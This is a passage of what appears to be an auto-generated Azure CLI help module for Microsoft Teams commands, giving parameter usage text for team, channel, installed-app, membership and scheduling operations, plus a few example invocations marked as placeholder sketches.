principal-type: The type of the assigned principal. This can either be 'User', 'Group' or \
'ServicePrincipal'. Read-only. Does not support $filter.
resource-display-name: The display name of the resource app's service principal to which the assignment is \
made. Does not support $filter.
resource-id: The unique identifier (id) for the resource service principal for which the assignment is \
made. Required on create. Supports $filter (eq only).
id: Read-only.
Multiple actions can be specified by using more than one --app-role-assignments argument.
- name: --created-on-behalf-of
short-summary: "Represents an Azure Active Directory object. The directoryObject type is the base type for \
many other directory entity types."
long-summary: |
Usage: --created-on-behalf-of deleted-date-time=XX id=XX
id: Read-only.
- name: --member-of
short-summary: "Groups that this group is a member of. HTTP Methods: GET (supported for all groups). \
Read-only. Nullable."
long-summary: |
Usage: --member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --member-of argument.
- name: --microsoft-graph-group-members
short-summary: "Users and groups that are members of this group. HTTP Methods: GET (supported for all groups), \
POST (supported for Microsoft 365 groups, security groups and mail-enabled security groups), DELETE (supported for \
Microsoft 365 groups and security groups) Nullable."
long-summary: |
Usage: --microsoft-graph-group-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --microsoft-graph-group-members argument.
- name: --members-with-license-errors
short-summary: "A list of group members with license errors from this group-based license assignment. \
Read-only."
long-summary: |
Usage: --members-with-license-errors deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --members-with-license-errors argument.
- name: --owners
short-summary: "The owners of the group. The owners are a set of non-admin users who are allowed to modify \
this object. Limited to 100 owners. HTTP Methods: GET (supported for all groups), POST (supported for Microsoft 365 \
groups, security groups and mail-enabled security groups), DELETE (supported for Microsoft 365 groups and security \
groups). Nullable."
long-summary: |
Usage: --owners deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --owners argument.
- name: --transitive-member-of
long-summary: |
Usage: --transitive-member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-member-of argument.
- name: --transitive-members
long-summary: |
Usage: --transitive-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-members argument.
- name: --accepted-senders
short-summary: "The list of users or groups that are allowed to create post's or calendar events in this \
group. If this list is non-empty then only users or groups listed here are allowed to post."
long-summary: |
Usage: --accepted-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --accepted-senders argument.
- name: --photo
short-summary: "profilePhoto"
long-summary: |
Usage: --photo height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
- name: --photos
short-summary: "The profile photos owned by the group. Read-only. Nullable."
long-summary: |
Usage: --photos height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
Multiple actions can be specified by using more than one --photos argument.
- name: --rejected-senders
short-summary: "The list of users or groups that are not allowed to create posts or calendar events in this \
group. Nullable."
long-summary: |
Usage: --rejected-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --rejected-senders argument.
- name: --extensions
short-summary: "The collection of open extensions defined for the group. Read-only. Nullable."
long-summary: |
Usage: --extensions id=XX
id: Read-only.
Multiple actions can be specified by using more than one --extensions argument.
- name: --group-lifecycle-policies
short-summary: "The collection of lifecycle policies for this group. Read-only. Nullable."
long-summary: |
Usage: --group-lifecycle-policies alternate-notification-emails=XX group-lifetime-in-days=XX \
managed-group-types=XX id=XX
alternate-notification-emails: List of email addresses to which notifications are sent for groups without owners. \
Multiple email addresses can be defined by separating them with a semicolon.
group-lifetime-in-days: Number of days before a group expires and needs to be renewed. Once renewed, the \
group expiration is extended by the number of days defined.
managed-group-types: The group type for which the expiration policy applies. Possible values are All, \
Selected or None.
id: Read-only.
Multiple actions can be specified by using more than one --group-lifecycle-policies argument.
- name: --offer-shift-requests
long-summary: |
Usage: --offer-shift-requests recipient-action-date-time=XX recipient-action-message=XX \
recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX manager-action-message=XX \
manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --offer-shift-requests argument.
- name: --open-shift-change-requests
long-summary: |
Usage: --open-shift-change-requests open-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
open-shift-id: ID for the open shift.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --open-shift-change-requests argument.
- name: --scheduling-groups
short-summary: "The logical grouping of users in the schedule (usually by role)."
long-summary: |
Usage: --scheduling-groups display-name=XX is-active=XX user-ids=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The display name for the schedulingGroup. Required.
is-active: Indicates whether the schedulingGroup can be used when creating new entities or updating \
existing ones. Required.
user-ids: The list of user IDs that are a member of the schedulingGroup. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --scheduling-groups argument.
- name: --swap-shifts-change-requests
long-summary: |
Usage: --swap-shifts-change-requests recipient-shift-id=XX recipient-action-date-time=XX \
recipient-action-message=XX recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-shift-id: ShiftId for the recipient user with whom the request is to swap.
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --swap-shifts-change-requests argument.
- name: --time-off-reasons
short-summary: "The set of reasons for a time off in the schedule."
long-summary: |
Usage: --time-off-reasons display-name=XX icon-type=XX is-active=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The name of the timeOffReason. Required.
is-active: Indicates whether the timeOffReason can be used when creating new entities or updating existing \
ones. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-reasons argument.
- name: --time-off-requests
long-summary: |
Usage: --time-off-requests end-date-time=XX start-date-time=XX time-off-reason-id=XX assigned-to=XX \
manager-action-date-time=XX manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX \
sender-user-id=XX state=XX created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
end-date-time: The Timestamp type represents date and time information using ISO 8601 format and is always \
in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
start-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
time-off-reason-id: The reason for the time off.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-requests argument.
"""
helps['teams team update'] = """
type: command
short-summary: "Update entity in teams."
parameters:
- name: --fun-settings
short-summary: "teamFunSettings"
long-summary: |
Usage: --fun-settings allow-custom-memes=XX allow-giphy=XX allow-stickers-and-memes=XX \
giphy-content-rating=XX
allow-custom-memes: If set to true, enables users to include custom memes.
allow-giphy: If set to true, enables Giphy use.
allow-stickers-and-memes: If set to true, enables users to include stickers and memes.
- name: --guest-settings
short-summary: "teamGuestSettings"
long-summary: |
Usage: --guest-settings allow-create-update-channels=XX allow-delete-channels=XX
allow-create-update-channels: If set to true, guests can add and update channels.
allow-delete-channels: If set to true, guests can delete channels.
- name: --member-settings
short-summary: "teamMemberSettings"
long-summary: |
Usage: --member-settings allow-add-remove-apps=XX allow-create-private-channels=XX \
allow-create-update-channels=XX allow-create-update-remove-connectors=XX allow-create-update-remove-tabs=XX \
allow-delete-channels=XX
allow-add-remove-apps: If set to true, members can add and remove apps.
allow-create-private-channels: If set to true, members can add and update private channels.
allow-create-update-channels: If set to true, members can add and update channels.
allow-create-update-remove-connectors: If set to true, members can add, update, and remove connectors.
allow-create-update-remove-tabs: If set to true, members can add, update, and remove tabs.
allow-delete-channels: If set to true, members can delete channels.
- name: --messaging-settings
short-summary: "teamMessagingSettings"
long-summary: |
Usage: --messaging-settings allow-channel-mentions=XX allow-owner-delete-messages=XX \
allow-team-mentions=XX allow-user-delete-messages=XX allow-user-edit-messages=XX
allow-channel-mentions: If set to true, @channel mentions are allowed.
allow-owner-delete-messages: If set to true, owners can delete any message.
allow-team-mentions: If set to true, @team mentions are allowed.
allow-user-delete-messages: If set to true, users can delete their messages.
allow-user-edit-messages: If set to true, users can edit their messages.
- name: --members
short-summary: "Members and owners of the team."
long-summary: |
Usage: --members display-name=XX roles=XX id=XX
display-name: The display name of the user.
roles: The roles for that user.
id: Read-only.
Multiple actions can be specified by using more than one --members argument.
- name: --assigned-labels
short-summary: "The list of sensitivity label pairs (label ID, label name) associated with an Microsoft 365 \
group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-labels display-name=XX label-id=XX
display-name: The display name of the label. Read-only.
label-id: The unique identifier of the label.
Multiple actions can be specified by using more than one --assigned-labels argument.
- name: --assigned-licenses
short-summary: "The licenses that are assigned to the group. Returned only on $select. Read-only."
long-summary: |
Usage: --assigned-licenses disabled-plans=XX sku-id=XX
disabled-plans: A collection of the unique identifiers for plans that have been disabled.
sku-id: The unique identifier for the SKU.
Multiple actions can be specified by using more than one --assigned-licenses argument.
- name: --license-processing-state
short-summary: "licenseProcessingState"
long-summary: |
Usage: --license-processing-state state=XX
- name: --on-premises-provisioning-errors
short-summary: "Errors when using Microsoft synchronization product during provisioning. Returned by default."
long-summary: |
Usage: --on-premises-provisioning-errors category=XX occurred-date-time=XX property-causing-error=XX \
value=XX
category: Category of the provisioning error. Note: Currently, there is only one possible value. Possible \
value: PropertyConflict - indicates a property value is not unique. Other objects contain the same value for the \
property.
occurred-date-time: The date and time at which the error occurred.
property-causing-error: Name of the directory property causing the error. Current possible values: \
UserPrincipalName or ProxyAddress
value: Value of the property causing the error.
Multiple actions can be specified by using more than one --on-premises-provisioning-errors argument.
- name: --app-role-assignments
long-summary: |
Usage: --app-role-assignments app-role-id=XX created-date-time=XX principal-display-name=XX \
principal-id=XX principal-type=XX resource-display-name=XX resource-id=XX deleted-date-time=XX id=XX
app-role-id: The identifier (id) for the app role which is assigned to the principal. This app role must \
be exposed in the appRoles property on the resource application's service principal (resourceId). If the resource \
application has not declared any app roles, a default app role ID of 00000000-0000-0000-0000-000000000000 can be \
specified to signal that the principal is assigned to the resource app without any specific app roles. Required on \
create. Does not support $filter.
principal-display-name: The display name of the user, group, or service principal that was granted the app \
role assignment. Read-only. Supports $filter (eq and startswith).
principal-id: The unique identifier (id) for the user, group or service principal being granted the app \
role. Required on create. Does not support $filter.
principal-type: The type of the assigned principal. This can either be 'User', 'Group' or \
'ServicePrincipal'. Read-only. Does not support $filter.
resource-display-name: The display name of the resource app's service principal to which the assignment is \
made. Does not support $filter.
resource-id: The unique identifier (id) for the resource service principal for which the assignment is \
made. Required on create. Supports $filter (eq only).
id: Read-only.
Multiple actions can be specified by using more than one --app-role-assignments argument.
- name: --created-on-behalf-of
short-summary: "Represents an Azure Active Directory object. The directoryObject type is the base type for \
many other directory entity types."
long-summary: |
Usage: --created-on-behalf-of deleted-date-time=XX id=XX
id: Read-only.
- name: --member-of
short-summary: "Groups that this group is a member of. HTTP Methods: GET (supported for all groups). \
Read-only. Nullable."
long-summary: |
Usage: --member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --member-of argument.
- name: --microsoft-graph-group-members
short-summary: "Users and groups that are members of this group. HTTP Methods: GET (supported for all groups), \
POST (supported for Microsoft 365 groups, security groups and mail-enabled security groups), DELETE (supported for \
Microsoft 365 groups and security groups) Nullable."
long-summary: |
Usage: --microsoft-graph-group-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --microsoft-graph-group-members argument.
- name: --members-with-license-errors
short-summary: "A list of group members with license errors from this group-based license assignment. \
Read-only."
long-summary: |
Usage: --members-with-license-errors deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --members-with-license-errors argument.
- name: --owners
short-summary: "The owners of the group. The owners are a set of non-admin users who are allowed to modify \
this object. Limited to 100 owners. HTTP Methods: GET (supported for all groups), POST (supported for Microsoft 365 \
groups, security groups and mail-enabled security groups), DELETE (supported for Microsoft 365 groups and security \
groups). Nullable."
long-summary: |
Usage: --owners deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --owners argument.
- name: --transitive-member-of
long-summary: |
Usage: --transitive-member-of deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-member-of argument.
- name: --transitive-members
long-summary: |
Usage: --transitive-members deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --transitive-members argument.
- name: --accepted-senders
short-summary: "The list of users or groups that are allowed to create post's or calendar events in this \
group. If this list is non-empty then only users or groups listed here are allowed to post."
long-summary: |
Usage: --accepted-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --accepted-senders argument.
- name: --photo
short-summary: "profilePhoto"
long-summary: |
Usage: --photo height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
- name: --photos
short-summary: "The profile photos owned by the group. Read-only. Nullable."
long-summary: |
Usage: --photos height=XX width=XX id=XX
height: The height of the photo. Read-only.
width: The width of the photo. Read-only.
id: Read-only.
Multiple actions can be specified by using more than one --photos argument.
- name: --rejected-senders
short-summary: "The list of users or groups that are not allowed to create posts or calendar events in this \
group. Nullable"
long-summary: |
Usage: --rejected-senders deleted-date-time=XX id=XX
id: Read-only.
Multiple actions can be specified by using more than one --rejected-senders argument.
- name: --extensions
short-summary: "The collection of open extensions defined for the group. Read-only. Nullable."
long-summary: |
Usage: --extensions id=XX
id: Read-only.
Multiple actions can be specified by using more than one --extensions argument.
- name: --group-lifecycle-policies
short-summary: "The collection of lifecycle policies for this group. Read-only. Nullable."
long-summary: |
Usage: --group-lifecycle-policies alternate-notification-emails=XX group-lifetime-in-days=XX \
managed-group-types=XX id=XX
            alternate-notification-emails: List of email addresses to send notifications for groups without owners. \
Multiple email addresses can be defined by separating them with a semicolon.
group-lifetime-in-days: Number of days before a group expires and needs to be renewed. Once renewed, the \
group expiration is extended by the number of days defined.
managed-group-types: The group type for which the expiration policy applies. Possible values are All, \
Selected or None.
id: Read-only.
Multiple actions can be specified by using more than one --group-lifecycle-policies argument.
- name: --offer-shift-requests
long-summary: |
Usage: --offer-shift-requests recipient-action-date-time=XX recipient-action-message=XX \
recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX manager-action-message=XX \
manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --offer-shift-requests argument.
- name: --open-shift-change-requests
long-summary: |
Usage: --open-shift-change-requests open-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
open-shift-id: ID for the open shift.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --open-shift-change-requests argument.
- name: --scheduling-groups
short-summary: "The logical grouping of users in the schedule (usually by role)."
long-summary: |
Usage: --scheduling-groups display-name=XX is-active=XX user-ids=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The display name for the schedulingGroup. Required.
is-active: Indicates whether the schedulingGroup can be used when creating new entities or updating \
existing ones. Required.
user-ids: The list of user IDs that are a member of the schedulingGroup. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --scheduling-groups argument.
- name: --swap-shifts-change-requests
long-summary: |
Usage: --swap-shifts-change-requests recipient-shift-id=XX recipient-action-date-time=XX \
recipient-action-message=XX recipient-user-id=XX sender-shift-id=XX assigned-to=XX manager-action-date-time=XX \
manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX sender-user-id=XX state=XX \
created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
recipient-shift-id: ShiftId for the recipient user with whom the request is to swap.
recipient-action-date-time: The Timestamp type represents date and time information using ISO 8601 format \
and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
recipient-action-message: Custom message sent by recipient of the offer shift request.
recipient-user-id: User ID of the recipient of the offer shift request.
sender-shift-id: User ID of the sender of the offer shift request.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --swap-shifts-change-requests argument.
- name: --time-off-reasons
short-summary: "The set of reasons for a time off in the schedule."
long-summary: |
Usage: --time-off-reasons display-name=XX icon-type=XX is-active=XX created-date-time=XX \
last-modified-date-time=XX application=XX device=XX user=XX id=XX
display-name: The name of the timeOffReason. Required.
is-active: Indicates whether the timeOffReason can be used when creating new entities or updating existing \
ones. Required.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-reasons argument.
- name: --time-off-requests
long-summary: |
Usage: --time-off-requests end-date-time=XX start-date-time=XX time-off-reason-id=XX assigned-to=XX \
manager-action-date-time=XX manager-action-message=XX manager-user-id=XX sender-date-time=XX sender-message=XX \
sender-user-id=XX state=XX created-date-time=XX last-modified-date-time=XX application=XX device=XX user=XX id=XX
end-date-time: The Timestamp type represents date and time information using ISO 8601 format and is always \
in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
start-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
time-off-reason-id: The reason for the time off.
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
last-modified-date-time: The Timestamp type represents date and time information using ISO 8601 format and \
is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '2014-01-01T00:00:00Z'
application: identity
device: identity
user: identity
id: Read-only.
Multiple actions can be specified by using more than one --time-off-requests argument.
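    examples:
      # Illustrative sketch only: the --team-id flag name is an assumption and the boolean values are placeholders;
      # only the --messaging-settings and --guest-settings keys come from the parameter help above.
      - name: Update a team's messaging and guest settings (illustrative placeholder values)
        text: |-
               az teams team update --team-id "{team-id}" --messaging-settings allow-channel-mentions=true \
allow-team-mentions=true allow-user-edit-messages=false --guest-settings allow-create-update-channels=false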
"""
helps['teams team delete-team'] = """
type: command
short-summary: "Delete entity from teams."
"""
helps['teams team show-team'] = """
type: command
short-summary: "Get entity from teams by key."
"""
helps['teams team'] = """
type: group
short-summary: Manage team with teams_v1_0
"""
helps['teams team archive'] = """
type: command
short-summary: "Invoke action archive."
"""
helps['teams team clone'] = """
type: command
short-summary: "Invoke action clone."
"""
helps['teams team create-channel'] = """
type: command
short-summary: "Create new navigation property to channels for teams."
parameters:
- name: --members
long-summary: |
Usage: --members display-name=XX roles=XX id=XX
display-name: The display name of the user.
roles: The roles for that user.
id: Read-only.
Multiple actions can be specified by using more than one --members argument.
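    examples:
      # Illustrative sketch only: --team-id and --display-name are assumed flag names that this help file does not
      # document; the --members key=value pairs come from the parameter help above and the values are placeholders.
      - name: Create a channel and add an initial member (illustrative placeholder values)
        text: |-
               az teams team create-channel --team-id "{team-id}" --display-name "Project Planning" \
--members display-name="Jane Doe" roles="owner"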
"""
helps['teams team create-installed-app'] = """
type: command
short-summary: "Create new navigation property to installedApps for teams."
parameters:
- name: --teams-app-definition
short-summary: "teamsAppDefinition"
long-summary: |
Usage: --teams-app-definition display-name=XX teams-app-id=XX version=XX id=XX
display-name: The name of the app provided by the app developer.
teams-app-id: The ID from the Teams app manifest.
version: The version number of the application.
id: Read-only.
- name: --app-definitions
short-summary: "The details for each version of the app."
long-summary: |
Usage: --app-definitions display-name=XX teams-app-id=XX version=XX id=XX
display-name: The name of the app provided by the app developer.
teams-app-id: The ID from the Teams app manifest.
version: The version number of the application.
id: Read-only.
Multiple actions can be specified by using more than one --app-definitions argument.
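    examples:
      # Illustrative sketch only: --team-id is an assumed flag name not documented in this file; the
      # --teams-app-definition keys come from the parameter help above and all values are placeholders.
      - name: Install an app into a team (illustrative placeholder values)
        text: |-
               az teams team create-installed-app --team-id "{team-id}" --teams-app-definition \
display-name="Contoso Tasks" teams-app-id="{teams-app-id}" version="1.0.0"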
"""
helps['teams team create-member'] = """
type: command
short-summary: "Create new navigation property to members for teams."
"""
helps['teams team create-operation'] = """
type: command
short-summary: "Create new navigation property to operations for teams."
parameters:
- name: --error
short-summary: "operationError"
long-summary: |
Usage: --error code=XX message=XX
code: Operation error code.
message: Operation error message.
"""
helps['teams team delete-channel'] = """
type: command
short-summary: "Delete navigation property channels for teams."
"""
helps['teams team delete-installed-app'] = """
type: command
short-summary: "Delete navigation property installedApps for teams."
"""
helps['teams team delete-member'] = """
type: command
short-summary: "Delete navigation property members for teams."
"""
helps['teams team delete-operation'] = """
type: command
short-summary: "Delete navigation property operations for teams."
"""
helps['teams team delete-primary-channel'] = """
type: command
short-summary: "Delete navigation property primaryChannel for teams."
"""
helps['teams team delete-ref-group'] = """
type: command
short-summary: "Delete ref of navigation property group for teams."
"""
helps['teams team delete-ref-template'] = """
type: command
short-summary: "Delete ref of navigation property template for teams."
"""
helps['teams team delete-schedule'] = """
type: command
short-summary: "Delete navigation property schedule for teams."
"""
helps['teams team list-channel'] = """
type: command
short-summary: "Get channels from teams."
"""
helps['teams team list-installed-app'] = """
type: command
short-summary: "Get installedApps from teams."
"""
helps['teams team list-member'] = """
type: command
short-summary: "Get members from teams."
"""
helps['teams team list-operation'] = """
type: command
short-summary: "Get operations from teams."
"""
helps['teams team set-ref-group'] = """
type: command
short-summary: "Update the ref of navigation property group in teams."
"""
helps['teams team set-ref-template'] = """
type: command
short-summary: "Update the ref of navigation property template in teams."
"""
helps['teams team show-all-message'] = """
type: command
short-summary: "Invoke function getAllMessages."
"""
helps['teams team show-channel'] = """
type: command
short-summary: "Get channels from teams."
"""
helps['teams team show-group'] = """
type: command
short-summary: "Get group from teams."
"""
helps['teams team show-installed-app'] = """
type: command
short-summary: "Get installedApps from teams."
"""
helps['teams team show-member'] = """
type: command
short-summary: "Get members from teams."
"""
helps['teams team show-operation'] = """
type: command
short-summary: "Get operations from teams."
"""
helps['teams team show-primary-channel'] = """
type: command
short-summary: "Get primaryChannel from teams."
"""
helps['teams team show-ref-group'] = """
type: command
short-summary: "Get ref of group from teams."
"""
helps['teams team show-ref-template'] = """
type: command
short-summary: "Get ref of template from teams."
"""
helps['teams team show-schedule'] = """
type: command
short-summary: "Get schedule from teams."
"""
helps['teams team show-template'] = """
type: command
short-summary: "Get template from teams."
"""
helps['teams team unarchive'] = """
type: command
short-summary: "Invoke action unarchive."
"""
helps['teams team update-channel'] = """
type: command
short-summary: "Update the navigation property channels in teams."
parameters:
- name: --members
long-summary: |
Usage: --members display-name=XX roles=XX id=XX
display-name: The display name of the user.
roles: The roles for that user.
id: Read-only.
Multiple actions can be specified by using more than one --members argument.
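    examples:
      # Illustrative sketch only: --team-id and --channel-id are assumed flag names not documented in this file;
      # the --members keys come from the parameter help above and the values are placeholders.
      - name: Update a channel's member list (illustrative placeholder values)
        text: |-
               az teams team update-channel --team-id "{team-id}" --channel-id "{channel-id}" \
--members display-name="Jane Doe" roles="member"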
"""
helps['teams team update-installed-app'] = """
type: command
short-summary: "Update the navigation property installedApps in teams."
parameters:
- name: --teams-app-definition
short-summary: "teamsAppDefinition"
long-summary: |
Usage: --teams-app-definition display-name=XX teams-app-id=XX version=XX id=XX
display-name: The name of the app provided by the app developer.
teams-app-id: The ID from the Teams app manifest.
version: The version number of the application.
id: Read-only.
- name: --app-definitions
short-summary: "The details for each version of the app."
long-summary: |
Usage: --app-definitions display-name=XX teams-app-id=XX version=XX id=XX
display-name: The name of the app provided by the app developer.
teams-app-id: The ID from the Teams app manifest.
version: The version number of the application.
id: Read-only.
Multiple actions can be specified by using more than one --app-definitions argument.
"""
helps['teams team update-member'] = """
type: command
short-summary: "Update the navigation property members in teams."
"""
helps['teams team update-operation'] = """
type: command
short-summary: "Update the navigation property operations in teams."
parameters:
- name: --error
short-summary: "operationError"
long-summary: |
Usage: --error code=XX message=XX
code: Operation error code.
message: Operation error message.
"""
helps['teams team update-primary-channel'] = """
type: command
short-summary: "Update the navigation property primaryChannel in teams."
parameters:
- name: --members
long-summary: |
Usage: --members display-name=XX roles=XX id=XX
display-name: The display name of the user.
roles: The roles for that user.
id: Read-only.
Multiple actions can be specified by using more than one --members argument.
"""
helps['teams team update-schedule'] = """
type: command
short-summary: "Update the navigation property schedule in teams."
parameters:
- name: --offer-shift-requests
long-summary: |
Usage: --offer-shift-requests recipient-action-date-time=XX recipient-action-message=XX \
